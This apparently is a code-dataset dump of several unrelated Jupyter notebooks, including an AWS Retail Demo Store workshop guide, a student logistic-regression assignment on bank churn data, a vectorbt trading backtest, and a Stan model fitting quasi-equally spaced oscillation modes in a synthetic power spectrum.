Complete New Account Form\n\nComplete all fields and be sure to use your actual mobile phone number, if possible, so that you can receive an account confirmation code via SMS. The user create and confirmation process is provided by Amazon Cognito. If you don't receive the SMS or had to use a fake phone number, you can manually confirm your user account by browsing to Amazon Cognito in this AWS account then select User Pools > Users, find your user and confirm.\n\n![Retail Demo Store Create Account](./images/retaildemostore-create-acct.png)\n\n#### 3. Confirm Account\n\nOnce you receive your confirmation code from Cognito via SMS, enter it here.\n\n![Retail Demo Store Confirm Account](./images/retaildemostore-confirm.png)\n\n#### 4. Sign In to Your Account\n\n![Retail Demo Store Sign In](./images/retaildemostore-signin.png)\n\n#### 5. Emulate Shopper\n\nThe Retail Demo Store provides the ability for you to emulate one of the existing shoppers in the system. This is useful when you want to test the product and search personalization capabilities (after the search and personalization workshops are completed).\n\nClick on your user name in upper right corner and then click on Profile to access the Profile page.\n\n![Retail Demo Store User Profile](./images/retaildemostore-user-menu.png)\n\nTo emulate a shopper, select a shopper from the drop down and click \"Save Changes\". Once saved, you can browse the storefront. This will be covered in more detail in the workshops.\n\n![Retail Demo Store Emulate Shopper](./images/retaildemostore-emulate.png)\n\n## Workshop Instructions\n\nEach workshop is implemented as a [Jupyter Notebook](https://jupyter.org/).\n\n> The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. 
Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more.\n\nOpen each notebook and follow along by reading and executing the cells sequentially. Use the \"run\" (\">\") button at the top of the notebook page to execute each cell.\n\n![Jupyter Notebook Play](./images/notebook-play.png)\n\n### Search Workshop\n\nThe [Search Workshop](./0-StartHere/Search.ipynb) will walk you through the process of creating an index in Amazon Elasticsearch and loading the index with information on the products in the Retail Demo Store. The Retail Demo Store's Search service uses this index to perform queries based on user-entered search terms.\n\n**[Open Workshop](./0-StartHere/Search.ipynb)**\n\n### Personalization Workshop\n\nThe [Personalization Workshop](./1-Personalization/personalize.ipynb) will walk you through the process of training and deploying machine learning models using Amazon Personalize to add product recommendations and personalized ranking to the Retail Demo Store. The Retail Demo Store's Recommendation service provides these features.\n\n**[Open Workshop](./1-Personalization/personalize.ipynb)**\n\n### Forecasting Workshop\n\nComing soon!\n\n### Experimentation Workshop\n\nThe [Experimentation Workshop](./3-Experimentation/3.1-Overview.ipynb) demonstrates how to add experimentation to the Retail Demo Store to evaluate the performance of different testing techniques. Three different approaches to experimentation are implemented including A/B testing, interleaved recommendation testing, and multi-armed bandit testing.\n\n**[Open Workshop](./3-Experimentation/3.1-Overview.ipynb)**", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e72ec0a7572751beb8bb54d34280bd664f2c5183
79,773
ipynb
Jupyter Notebook
module1-afirstlookatdata/LS_DS_111_A_First_Look_at_Data.ipynb
BaiganKing/DS-Unit-1-Sprint-1-Dealing-With-Data
01e0a55ff626472fe68ba8981c1fa9f5bd12c3ed
[ "MIT" ]
1
2019-07-15T19:11:09.000Z
2019-07-15T19:11:09.000Z
module1-afirstlookatdata/LS_DS_111_A_First_Look_at_Data.ipynb
BaiganKing/DS-Unit-1-Sprint-1-Dealing-With-Data
01e0a55ff626472fe68ba8981c1fa9f5bd12c3ed
[ "MIT" ]
null
null
null
module1-afirstlookatdata/LS_DS_111_A_First_Look_at_Data.ipynb
BaiganKing/DS-Unit-1-Sprint-1-Dealing-With-Data
01e0a55ff626472fe68ba8981c1fa9f5bd12c3ed
[ "MIT" ]
null
null
null
60.479909
23,092
0.563411
[ [ [ "<a href=\"https://colab.research.google.com/github/BaiganKing/DS-Unit-1-Sprint-1-Dealing-With-Data/blob/master/module1-afirstlookatdata/LS_DS_111_A_First_Look_at_Data.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "# Lambda School Data Science - A First Look at Data\n\n", "_____no_output_____" ], [ "## Lecture - let's explore Python DS libraries and examples!\n\nThe Python Data Science ecosystem is huge. You've seen some of the big pieces - pandas, scikit-learn, matplotlib. What parts do you want to see more of?", "_____no_output_____" ] ], [ [ "# TODO - we'll be doing this live, taking requests\n# and reproducing what it is to look up and learn things\n\ndrinks = ['coke', 'sprite', 'juice', 'water']", "_____no_output_____" ] ], [ [ "## Assignment - now it's your turn\n\nPick at least one Python DS library, and using documentation/examples reproduce in this notebook something cool. 
It's OK if you don't fully understand it or get it 100% working, but do put in effort and look things up.", "_____no_output_____" ] ], [ [ "# TODO - your code here\n# Use what we did live in lecture as an example", "_____no_output_____" ], [ "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport statsmodels.discrete.discrete_model as smdis\nimport statsmodels.stats.outliers_influence as outliers\nfrom google.colab import files", "_____no_output_____" ], [ "uploaded = files.upload() \n#csv used - https://sds-platform-private.s3-us-east-2.amazonaws.com/uploads/P12-Churn-Modelling-Test-Data.csv", "_____no_output_____" ], [ "for fn in uploaded.keys():\n print('User uploaded file \"{name}\" with length {length} bytes'.format(\n name=fn, length=len(uploaded[fn])))", "User uploaded file \"P12-Churn-Modelling-Test-Data.csv\" with length 69498 bytes\n" ], [ "df = pd.read_csv(\"P12-Churn-Modelling-Test-Data.csv\", index_col=None)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df_y = df['Exited']\ndf_x = df.drop(['Exited'], axis = 1)", "_____no_output_____" ], [ "dummy = pd.get_dummies(df_x['Gender'])\ndf_x = dummy.join(df_x)\ndummy = pd.get_dummies(df_x['Geography'])\ndf_x = dummy.join(df_x)", "_____no_output_____" ], [ "df_x.head()", "_____no_output_____" ], [ "df_x = df_x.drop(['Gender', 'Female', 'France', 'Geography'], axis =1)\ndf_x.head()", "_____no_output_____" ], [ "df_x = sm.add_constant(df_x)\ndf_x.head()", "/usr/local/lib/python3.6/dist-packages/numpy/core/fromnumeric.py:2389: FutureWarning: Method .ptp is deprecated and will be removed in a future version. 
Use numpy.ptp instead.\n return ptp(axis=axis, out=out, **kwargs)\n" ], [ "df_x = df_x.drop(['RowNumber', 'CustomerId', 'Surname'], axis = 1)\ndf_x.head()", "_____no_output_____" ], [ "plt.scatter(df_x['CreditScore'], df_x['Age'])", "_____no_output_____" ], [ "model = smdis.Logit(df_y, df_x).fit()", "Optimization terminated successfully.\n Current function value: 0.495422\n Iterations 6\n" ], [ "model.summary()", "_____no_output_____" ] ], [ [ "### Assignment questions\n\nAfter you've worked on some code, answer the following questions in this text block:\n\n1. Describe in a paragraph of text what you did and why, as if you were writing an email to somebody interested but nontechnical.\n\n2. What was the most challenging part of what you did?\n\n3. What was the most interesting thing you learned?\n\n4. What area would you like to explore with more time?\n\nIn the above code, I took a dataset and from it, I made a graph to show the relationship between age and credit score in both Germany and Spain, I also created a model to help predict future data based on patterns in the current dataset. The most challenging part of this assignment for me was learning about a Python library I haven't come across thus far. This also tied into what was the most interesting thing I learned completing this assignment. With more time I would explore much more Python libraries because the more tools I can have at my disposal the more possibilities there will be with my code.\n\n", "_____no_output_____" ], [ "## Stretch goals and resources\n\nFollowing are *optional* things for you to take a look at. 
Focus on the above assignment first, and make sure to commit and push your changes to GitHub (and since this is the first assignment of the sprint, open a PR as well).\n\n- [pandas documentation](https://pandas.pydata.org/pandas-docs/stable/)\n- [scikit-learn documentation](http://scikit-learn.org/stable/documentation.html)\n- [matplotlib documentation](https://matplotlib.org/contents.html)\n- [Awesome Data Science](https://github.com/bulutyazilim/awesome-datascience) - a list of many types of DS resources\n\nStretch goals:\n\n- Find and read blogs, walkthroughs, and other examples of people working through cool things with data science - and share with your classmates!\n- Write a blog post (Medium is a popular place to publish) introducing yourself as somebody learning data science, and talking about what you've learned already and what you're excited to learn more about.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ] ]
e72ed2380a80e50298918595bbad6a7cc360d7e0
48,578
ipynb
Jupyter Notebook
bot/wq.ipynb
psemdel/py-trading-bot
69da4164b3f6a3ed3e6dc81d5aefc0273b4cb019
[ "MIT" ]
null
null
null
bot/wq.ipynb
psemdel/py-trading-bot
69da4164b3f6a3ed3e6dc81d5aefc0273b4cb019
[ "MIT" ]
1
2022-02-07T21:13:55.000Z
2022-02-07T21:13:55.000Z
bot/wq.ipynb
psemdel/py-trading-bot
69da4164b3f6a3ed3e6dc81d5aefc0273b4cb019
[ "MIT" ]
null
null
null
35.175959
141
0.316975
[ [ [ "## To backstage the strategies with action pre-selection using historical and pre-saved data\n\nimport vectorbtpro as vbt\nimport numpy as np\nimport pandas as pd\n\nimport importlib\nimport inspect\nfrom numba import njit\nimport talib\nimport math\n\nfrom core import strat, indicators, bt\n\n\n", "_____no_output_____" ], [ "importlib.reload(bt)", "_____no_output_____" ], [ "#wq=bt.WQ(\"CAC40\",\"2007_2009\",54)\n#wq=bt.WQ(\"DAX\",\"2007_2009\",54)\nwq=bt.WQ(\"NASDAQ\",\"2007_2009\",54)\n", "_____no_output_____" ], [ "#wq.use_macro()\nwq.def_cand()\nwq.calculate(nostrat11=True) #only_exit_strat11=True\n\n\npf=vbt.Portfolio.from_signals(wq.close, wq.entries,wq.exits,short_entries=wq.entries_short,short_exits =wq.exits_short,freq=\"1d\",\n call_seq='auto',cash_sharing=True#, fees=0.0005\n )\npf.returns_stats()\n#pf.stats()\n\n", "_____no_output_____" ], [ "pf.plot()\n", "_____no_output_____" ], [ "pf=vbt.Portfolio.from_signals(wq.close, wq.entries,wq.exits,short_entries=wq.entries_short,short_exits =wq.exits_short,freq=\"1d\",\n call_seq='auto',cash_sharing=True,\n )\npf.returns_stats()", "_____no_output_____" ], [ "pf.trades.records.sort_values([\"entry_idx\"], ascending=True).head(50)", "_____no_output_____" ], [ "dic={}\n\nfor symbol in wq.close.columns:\n sub_pf=vbt.Portfolio.from_signals(wq.close[symbol], wq.entries[symbol],wq.exits[symbol],short_entries=wq.entries_short[symbol],\n short_exits =wq.exits_short[symbol],freq=\"1d\",\n call_seq='auto')\n dic[symbol]=sub_pf.get_total_return()\n#sub_pf.returns_stats()\n\ndic", "_____no_output_____" ], [ "symbol=\"AI\"\nsub_pf=vbt.Portfolio.from_signals(wq.close[symbol], wq.entries[symbol],wq.exits[symbol],short_entries=wq.entries_short[symbol],\n short_exits =wq.exits_short[symbol],freq=\"1d\",\n call_seq='auto')\n\nsub_pf.returns_stats()\n", "_____no_output_____" ], [ "sub_pf.plot()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72eeaf006ac4cd4fec9c098e6a4d35912e86968
724,487
ipynb
Jupyter Notebook
JoshFiles/Stan Practice/Mode_Fitting.ipynb
daw538/y4project
f8b7cb7c8ee0a5312a661a366e339371cf428533
[ "MIT" ]
null
null
null
JoshFiles/Stan Practice/Mode_Fitting.ipynb
daw538/y4project
f8b7cb7c8ee0a5312a661a366e339371cf428533
[ "MIT" ]
null
null
null
JoshFiles/Stan Practice/Mode_Fitting.ipynb
daw538/y4project
f8b7cb7c8ee0a5312a661a366e339371cf428533
[ "MIT" ]
null
null
null
532.711029
306,496
0.929887
[ [ [ "# Mode fitting\n\nHere we will make a simple hierarchical model that encodes some knowledge of quasi-equally spaced modes of oscillation into the prior. Using data from papers: ", "_____no_output_____" ] ], [ [ "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nimport seaborn as sns\nimport pystan", "_____no_output_____" ] ], [ [ "Spectral analysis of a signal generated by a sum of 14 cosine waves whose frequencies follow: \n\n$f_{n, {\\rm true}} = (n + 0.5) \\Delta \\nu + \\mathcal{N}(0, 0.02)$.\n\nThen spectral analysis identifies the component frequencies and from this the frequency spacing can be found.", "_____no_output_____" ] ], [ [ "def gaussian(f, f0, h, w):\n return h * np.exp(-0.5 * (f - f0)**2 / w**2)\n\nfs = 10e3\nN = 1e5\ndnu = 2.0\nnumax = 14.0\ntime = np.arange(N) / fs\nf0s = (np.arange(0, 14, 1) + 0.5) * dnu \n#f0s += np.random.randn(len(f0s)) * 0.02\nx = 0\n\nfor n in f0s:\n #print(gaussian(n, numax, 25.0, 5.0))\n x += gaussian(n, numax, 25.0, 5.0)*np.cos(2*np.pi*n*time)\n \nx += 200*np.random.randn(len(x))\nx = x/3.5\n\nf, Pxx_den = signal.periodogram(x, fs, scaling='spectrum')\n \nfig, axs = plt.subplots(1, 2, figsize=(14, 4))\naxs[0].plot(time,x)\naxs[0].set_ylabel('Luminosity (Arbitrary units)')\naxs[0].set_xlabel('Time (s)')\naxs[0].set_xlim([0, 3])\naxs[1].plot(f, Pxx_den)\n#axs[1].set_ylim([1e-7, 1e2])\naxs[1].set_xlim([0, 28])\naxs[1].set_xlabel('Frequency [Hz]')\naxs[1].set_ylabel('PSD')", "_____no_output_____" ] ], [ [ "Can find $\\Delta\\nu$ by calculating the distance between 2 adjacent peaks:", "_____no_output_____" ] ], [ [ "peaks = signal.find_peaks(Pxx_den, 3)\nfor i in range(len(peaks[0])-1):\n print(f[peaks[0][i+1]]-f[peaks[0][i]])", "2.0\n2.0\n2.0\n2.0\n2.0\n" ], [ "bin_width = f[1] - f[0]\nw = int(dnu / bin_width)\ns = 0\nh = int(np.floor(len(Pxx_den[s:]) / w))\nprint(len(Pxx_den[s:]))\nprint(h,w)\nladder_p = np.reshape(Pxx_den[s:h*w+s], [h, w])\nladder_f = np.reshape(f[s:h*w+s], [h, w])", 
"50001\n2500 20\n" ], [ "from astropy.convolution import Gaussian1DKernel, convolve\nfig, ax = plt.subplots()\nax.plot(ladder_f[0,:] / dnu, np.mean(ladder_p, axis=0))\n# Create kernel\ng = Gaussian1DKernel(stddev=2)\n# Convolve data\nz = convolve(np.mean(ladder_p, axis=0), g)\nax.plot(ladder_f[0,:] / dnu, z, 'k-', lw=2)\n# Create kernel\ng = Gaussian1DKernel(stddev=10)\n# Convolve data\nz = convolve(np.mean(ladder_p, axis=0), g)\nax.plot(ladder_f[0,:] / dnu, z, 'r-', lw=1)", "_____no_output_____" ], [ "n_max = numax / dnu\nnn = 14\nd_f = ladder_f[0,:] / dnu", "_____no_output_____" ], [ "fig, ax = plt.subplots(nn)\nfor i in range(int(nn)):\n ax[i].plot(d_f, ladder_p[i,:], label=f'Index: {i}')\n ax[i].set_yticks([]) \nplt.subplots_adjust(hspace=0.0, wspace=0.0)\n\n#print(len(ladder_f[0,:]))\n#print(len(ladder_p[:,0]))\n#print(ladder_f) \n#print(ladder_p)", "_____no_output_____" ], [ "code = '''\nfunctions {\n real gaussian(real f, real numax, real width, real height){\n return height * exp(-0.5 * (f - numax)^2 / width^2);\n }\n}\ndata {\n int N; // Data points per order\n int M; // Number of orders\n real freq[M, N];\n real snr[M, N];\n real dnu_est;\n real numax_est;\n}\nparameters {\n real<lower = 0> dnu;\n real<lower = 0> numax;\n real<lower = 0> envwidth;\n real<lower = 0> envheight;\n real modewidth;\n real delta[M];\n real<lower = 0> scale;\n}\ntransformed parameters {\n real mode_freqs[M];\n real mode_heights[M];\n for (i in 1:M){\n mode_freqs[i] = (i-0.5) * dnu + delta[i] * scale;\n mode_heights[i] = gaussian(mode_freqs[i], numax, envwidth, envheight);\n }\n}\nmodel {\n real beta[N];\n for (i in 1:M){\n for (j in 1:N){\n beta[j] = (1.0 + lor(freq[i, j], mode_freqs[i], modewidth, mode_heights[i]));\n }\n snr[i, :] ~ normal(beta, 1.0);\n }\n dnu ~ normal(dnu_est, dnu_est * 0.01);\n dnu ~ uniform(dnu_est * 0.9, dnu_est * 1.1);\n numax ~ normal(numax_est, numax_est * 0.01);\n numax ~ uniform(numax_est * 0.9, numax_est * 1.1);\n envwidth ~ normal(5.0, 1.0);\n 
envheight ~ normal(25.0, 3.0);\n modewidth ~ lognormal(log(0.1), 0.05);\n modewidth ~ uniform(0, 0.5);\n delta ~ normal(0, 1); \n scale ~ normal(0, 0.01);\n}\n'''\nimport pystan\nsm = pystan.StanModel(model_code=code)", "INFO:pystan:COMPILING THE C++ CODE FOR MODEL anon_model_ae1e6452f5130395d3f50a4387192288 NOW.\n/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/Cython/Compiler/Main.py:367: FutureWarning: Cython directive 'language_level' not set, using 2 for now (Py2). This will change in a later release! File: /var/folders/2_/b8v0t8pn1hj1p3r4lyfvvv2h0000gn/T/tmpomjnfxvw/stanfit4anon_model_ae1e6452f5130395d3f50a4387192288_2879619315622853885.pyx\n tree = Parsing.p_module(s, pxd, full_module_name)\n" ], [ "stan_data = {'N': len(ladder_f[0,:]), 'M': len(ladder_p[:,0]), \n 'freq': ladder_f, 'snr': ladder_p,\n 'dnu_est': dnu, 'numax_est': numax}\nnchains = 4\nstart = {'dnu': dnu, 'numax': numax}\nfitsm = sm.sampling(data=stan_data, iter=20000, chains=nchains, init=[start for n in range(nchains)])", "_____no_output_____" ], [ "fitsm.plot()\nplt.show()", "_____no_output_____" ], [ "print(fitsm)", "_____no_output_____" ] ], [ [ "# Guy's Code\n\nLet's set up the data first. We will define a bunch of Lorentzian modes that are nearly equally spaced in frequency. The mode heights will be controlled by a Gaussian function. \n\nSo the mode frequencies will be defined as:\n\n$f_{n, {\\rm true}} = (n + 0.5) \\Delta \\nu + \\mathcal{N}(0, 0.02)$.\n\nand the envelope (height of lorentzian) will just be:\n\n$H_n = 25.0 \\exp(-0.5 (f_{n, {\\rm true}} - \\nu_{\\rm max})^2 / 5^2)$\n\nThe data are then just the model of the sum of the Lorentzians, evaluated a frequencies $f_{i}$, plus 1. 
To the data we add Gaussian noise (to keep things simple) with mean zero and standard deviation of unity.", "_____no_output_____" ] ], [ [ "def lor(f, f0, w, h):\n return h / (1.0 + 4.0 * ((f - f0)/w)**2)\n\ndef gaussian(f, f0, h, w):\n return h * np.exp(-0.5 * (f - f0)**2 / w**2)\n\nnp.random.seed(53)\nf = np.linspace(0, 28, 1000)\ndnu = 2.0\nnumax = 14.0\nf0s = (np.arange(0, 14, 1) + 0.5) * dnu \nf0s += np.random.randn(len(f0s)) * 0.02 #f_n,true\ntrue = np.ones(len(f))\ntrue += np.sum([lor(f, n, 0.1, gaussian(n, numax, 25.0, 5.0)) for n in f0s], axis=0)\n#data = true * np.random.chisquare(2, len(true)) / 2.0\ndata = true + np.random.randn(len(true))\nfig, ax = plt.subplots()\nax.plot(f, true, label='True', zorder=0)\nax.plot(f, data, label='Data', alpha=0.4)\nax.legend()\nax.set_ylabel('SNR')\nax.set_xlabel('Frequnency')", "_____no_output_____" ] ], [ [ "We now transform the data into a ladder, or echelle, with one mode in each segment.", "_____no_output_____" ] ], [ [ "bin_width = f[1] - f[0]\nprint(bin_width)\nw = int(dnu / bin_width)\nprint(len(data[s:]), w)\ns = 0\nh = int(np.floor(len(data[s:]) / w))\nladder_p = np.reshape(data[s:h*w+s], [h, w])\nladder_f = np.reshape(f[s:h*w+s], [h, w])", "0.1\n1000 20\n" ] ], [ [ "We can collapse the echelle and combine with some smoothing techniques to show you the data:", "_____no_output_____" ] ], [ [ "from astropy.convolution import Gaussian1DKernel, convolve\nfig, ax = plt.subplots()\nax.plot(ladder_f[0,:] / dnu, np.mean(ladder_p, axis=0))\n# Create kernel\ng = Gaussian1DKernel(stddev=5)\n# Convolve data\nz = convolve(np.mean(ladder_p, axis=0), g)\nax.plot(ladder_f[0,:] / dnu, z, 'k-', lw=2)\n# Create kernel\ng = Gaussian1DKernel(stddev=15)\n# Convolve data\nz = convolve(np.mean(ladder_p, axis=0), g)\nax.plot(ladder_f[0,:] / dnu, z, 'r-', lw=1)", "_____no_output_____" ], [ "n_max = numax / dnu\nnn = 14\nd_f = ladder_f[0,:] / dnu", "_____no_output_____" ] ], [ [ "Now we can plot the uncollapsed echelle:", 
"_____no_output_____" ] ], [ [ "fig, ax = plt.subplots(nn)\nfor i in range(int(nn)):\n ax[i].plot(d_f, ladder_p[i,:], label=f'Index: {i}')\n ax[i].set_yticks([]) \nplt.subplots_adjust(hspace=0.0, wspace=0.0)\n\n#print(len(ladder_f[0,:]))\n#print(len(ladder_p[:,0]))\n#print(ladder_f) \n#print(ladder_p)", "71\n14\n[[ 0. 0.02802803 0.05605606 0.08408408 0.11211211 0.14014014\n 0.16816817 0.1961962 0.22422422 0.25225225 0.28028028 0.30830831\n 0.33633634 0.36436436 0.39239239 0.42042042 0.44844845 0.47647648\n 0.5045045 0.53253253 0.56056056 0.58858859 0.61661662 0.64464464\n 0.67267267 0.7007007 0.72872873 0.75675676 0.78478478 0.81281281\n 0.84084084 0.86886887 0.8968969 0.92492492 0.95295295 0.98098098\n 1.00900901 1.03703704 1.06506507 1.09309309 1.12112112 1.14914915\n 1.17717718 1.20520521 1.23323323 1.26126126 1.28928929 1.31731732\n 1.34534535 1.37337337 1.4014014 1.42942943 1.45745746 1.48548549\n 1.51351351 1.54154154 1.56956957 1.5975976 1.62562563 1.65365365\n 1.68168168 1.70970971 1.73773774 1.76576577 1.79379379 1.82182182\n 1.84984985 1.87787788 1.90590591 1.93393393 1.96196196]\n [ 1.98998999 2.01801802 2.04604605 2.07407407 2.1021021 2.13013013\n 2.15815816 2.18618619 2.21421421 2.24224224 2.27027027 2.2982983\n 2.32632633 2.35435435 2.38238238 2.41041041 2.43843844 2.46646647\n 2.49449449 2.52252252 2.55055055 2.57857858 2.60660661 2.63463463\n 2.66266266 2.69069069 2.71871872 2.74674675 2.77477477 2.8028028\n 2.83083083 2.85885886 2.88688689 2.91491491 2.94294294 2.97097097\n 2.998999 3.02702703 3.05505506 3.08308308 3.11111111 3.13913914\n 3.16716717 3.1951952 3.22322322 3.25125125 3.27927928 3.30730731\n 3.33533534 3.36336336 3.39139139 3.41941942 3.44744745 3.47547548\n 3.5035035 3.53153153 3.55955956 3.58758759 3.61561562 3.64364364\n 3.67167167 3.6996997 3.72772773 3.75575576 3.78378378 3.81181181\n 3.83983984 3.86786787 3.8958959 3.92392392 3.95195195]\n [ 3.97997998 4.00800801 4.03603604 4.06406406 4.09209209 4.12012012\n 4.14814815 4.17617618 
4.2042042 4.23223223 4.26026026 4.28828829\n 4.31631632 4.34434434 4.37237237 4.4004004 4.42842843 4.45645646\n 4.48448448 4.51251251 4.54054054 4.56856857 4.5965966 4.62462462\n 4.65265265 4.68068068 4.70870871 4.73673674 4.76476476 4.79279279\n 4.82082082 4.84884885 4.87687688 4.9049049 4.93293293 4.96096096\n 4.98898899 5.01701702 5.04504505 5.07307307 5.1011011 5.12912913\n 5.15715716 5.18518519 5.21321321 5.24124124 5.26926927 5.2972973\n 5.32532533 5.35335335 5.38138138 5.40940941 5.43743744 5.46546547\n 5.49349349 5.52152152 5.54954955 5.57757758 5.60560561 5.63363363\n 5.66166166 5.68968969 5.71771772 5.74574575 5.77377377 5.8018018\n 5.82982983 5.85785786 5.88588589 5.91391391 5.94194194]\n [ 5.96996997 5.997998 6.02602603 6.05405405 6.08208208 6.11011011\n 6.13813814 6.16616617 6.19419419 6.22222222 6.25025025 6.27827828\n 6.30630631 6.33433433 6.36236236 6.39039039 6.41841842 6.44644645\n 6.47447447 6.5025025 6.53053053 6.55855856 6.58658659 6.61461461\n 6.64264264 6.67067067 6.6986987 6.72672673 6.75475475 6.78278278\n 6.81081081 6.83883884 6.86686687 6.89489489 6.92292292 6.95095095\n 6.97897898 7.00700701 7.03503504 7.06306306 7.09109109 7.11911912\n 7.14714715 7.17517518 7.2032032 7.23123123 7.25925926 7.28728729\n 7.31531532 7.34334334 7.37137137 7.3993994 7.42742743 7.45545546\n 7.48348348 7.51151151 7.53953954 7.56756757 7.5955956 7.62362362\n 7.65165165 7.67967968 7.70770771 7.73573574 7.76376376 7.79179179\n 7.81981982 7.84784785 7.87587588 7.9039039 7.93193193]\n [ 7.95995996 7.98798799 8.01601602 8.04404404 8.07207207 8.1001001\n 8.12812813 8.15615616 8.18418418 8.21221221 8.24024024 8.26826827\n 8.2962963 8.32432432 8.35235235 8.38038038 8.40840841 8.43643644\n 8.46446446 8.49249249 8.52052052 8.54854855 8.57657658 8.6046046\n 8.63263263 8.66066066 8.68868869 8.71671672 8.74474474 8.77277277\n 8.8008008 8.82882883 8.85685686 8.88488488 8.91291291 8.94094094\n 8.96896897 8.996997 9.02502503 9.05305305 9.08108108 9.10910911\n 9.13713714 
9.16516517 9.19319319 9.22122122 9.24924925 9.27727728\n 9.30530531 9.33333333 9.36136136 9.38938939 9.41741742 9.44544545\n 9.47347347 9.5015015 9.52952953 9.55755756 9.58558559 9.61361361\n 9.64164164 9.66966967 9.6976977 9.72572573 9.75375375 9.78178178\n 9.80980981 9.83783784 9.86586587 9.89389389 9.92192192]\n [ 9.94994995 9.97797798 10.00600601 10.03403403 10.06206206 10.09009009\n 10.11811812 10.14614615 10.17417417 10.2022022 10.23023023 10.25825826\n 10.28628629 10.31431431 10.34234234 10.37037037 10.3983984 10.42642643\n 10.45445445 10.48248248 10.51051051 10.53853854 10.56656657 10.59459459\n 10.62262262 10.65065065 10.67867868 10.70670671 10.73473473 10.76276276\n 10.79079079 10.81881882 10.84684685 10.87487487 10.9029029 10.93093093\n 10.95895896 10.98698699 11.01501502 11.04304304 11.07107107 11.0990991\n 11.12712713 11.15515516 11.18318318 11.21121121 11.23923924 11.26726727\n 11.2952953 11.32332332 11.35135135 11.37937938 11.40740741 11.43543544\n 11.46346346 11.49149149 11.51951952 11.54754755 11.57557558 11.6036036\n 11.63163163 11.65965966 11.68768769 11.71571572 11.74374374 11.77177177\n 11.7997998 11.82782783 11.85585586 11.88388388 11.91191191]\n [11.93993994 11.96796797 11.995996 12.02402402 12.05205205 12.08008008\n 12.10810811 12.13613614 12.16416416 12.19219219 12.22022022 12.24824825\n 12.27627628 12.3043043 12.33233233 12.36036036 12.38838839 12.41641642\n 12.44444444 12.47247247 12.5005005 12.52852853 12.55655656 12.58458458\n 12.61261261 12.64064064 12.66866867 12.6966967 12.72472472 12.75275275\n 12.78078078 12.80880881 12.83683684 12.86486486 12.89289289 12.92092092\n 12.94894895 12.97697698 13.00500501 13.03303303 13.06106106 13.08908909\n 13.11711712 13.14514515 13.17317317 13.2012012 13.22922923 13.25725726\n 13.28528529 13.31331331 13.34134134 13.36936937 13.3973974 13.42542543\n 13.45345345 13.48148148 13.50950951 13.53753754 13.56556557 13.59359359\n 13.62162162 13.64964965 13.67767768 13.70570571 13.73373373 13.76176176\n 
13.78978979 13.81781782 13.84584585 13.87387387 13.9019019 ]\n [13.92992993 13.95795796 13.98598599 14.01401401 14.04204204 14.07007007\n 14.0980981 14.12612613 14.15415415 14.18218218 14.21021021 14.23823824\n 14.26626627 14.29429429 14.32232232 14.35035035 14.37837838 14.40640641\n 14.43443443 14.46246246 14.49049049 14.51851852 14.54654655 14.57457457\n 14.6026026 14.63063063 14.65865866 14.68668669 14.71471471 14.74274274\n 14.77077077 14.7987988 14.82682683 14.85485485 14.88288288 14.91091091\n 14.93893894 14.96696697 14.99499499 15.02302302 15.05105105 15.07907908\n 15.10710711 15.13513514 15.16316316 15.19119119 15.21921922 15.24724725\n 15.27527528 15.3033033 15.33133133 15.35935936 15.38738739 15.41541542\n 15.44344344 15.47147147 15.4994995 15.52752753 15.55555556 15.58358358\n 15.61161161 15.63963964 15.66766767 15.6956957 15.72372372 15.75175175\n 15.77977978 15.80780781 15.83583584 15.86386386 15.89189189]\n [15.91991992 15.94794795 15.97597598 16.004004 16.03203203 16.06006006\n 16.08808809 16.11611612 16.14414414 16.17217217 16.2002002 16.22822823\n 16.25625626 16.28428428 16.31231231 16.34034034 16.36836837 16.3963964\n 16.42442442 16.45245245 16.48048048 16.50850851 16.53653654 16.56456456\n 16.59259259 16.62062062 16.64864865 16.67667668 16.7047047 16.73273273\n 16.76076076 16.78878879 16.81681682 16.84484484 16.87287287 16.9009009\n 16.92892893 16.95695696 16.98498498 17.01301301 17.04104104 17.06906907\n 17.0970971 17.12512513 17.15315315 17.18118118 17.20920921 17.23723724\n 17.26526527 17.29329329 17.32132132 17.34934935 17.37737738 17.40540541\n 17.43343343 17.46146146 17.48948949 17.51751752 17.54554555 17.57357357\n 17.6016016 17.62962963 17.65765766 17.68568569 17.71371371 17.74174174\n 17.76976977 17.7977978 17.82582583 17.85385385 17.88188188]\n [17.90990991 17.93793794 17.96596597 17.99399399 18.02202202 18.05005005\n 18.07807808 18.10610611 18.13413413 18.16216216 18.19019019 18.21821822\n 18.24624625 18.27427427 18.3023023 18.33033033 
18.35835836 18.38638639\n 18.41441441 18.44244244 18.47047047 18.4984985 18.52652653 18.55455455\n 18.58258258 18.61061061 18.63863864 18.66666667 18.69469469 18.72272272\n 18.75075075 18.77877878 18.80680681 18.83483483 18.86286286 18.89089089\n 18.91891892 18.94694695 18.97497497 19.003003 19.03103103 19.05905906\n 19.08708709 19.11511512 19.14314314 19.17117117 19.1991992 19.22722723\n 19.25525526 19.28328328 19.31131131 19.33933934 19.36736737 19.3953954\n 19.42342342 19.45145145 19.47947948 19.50750751 19.53553554 19.56356356\n 19.59159159 19.61961962 19.64764765 19.67567568 19.7037037 19.73173173\n 19.75975976 19.78778779 19.81581582 19.84384384 19.87187187]\n [19.8998999 19.92792793 19.95595596 19.98398398 20.01201201 20.04004004\n 20.06806807 20.0960961 20.12412412 20.15215215 20.18018018 20.20820821\n 20.23623624 20.26426426 20.29229229 20.32032032 20.34834835 20.37637638\n 20.4044044 20.43243243 20.46046046 20.48848849 20.51651652 20.54454454\n 20.57257257 20.6006006 20.62862863 20.65665666 20.68468468 20.71271271\n 20.74074074 20.76876877 20.7967968 20.82482482 20.85285285 20.88088088\n 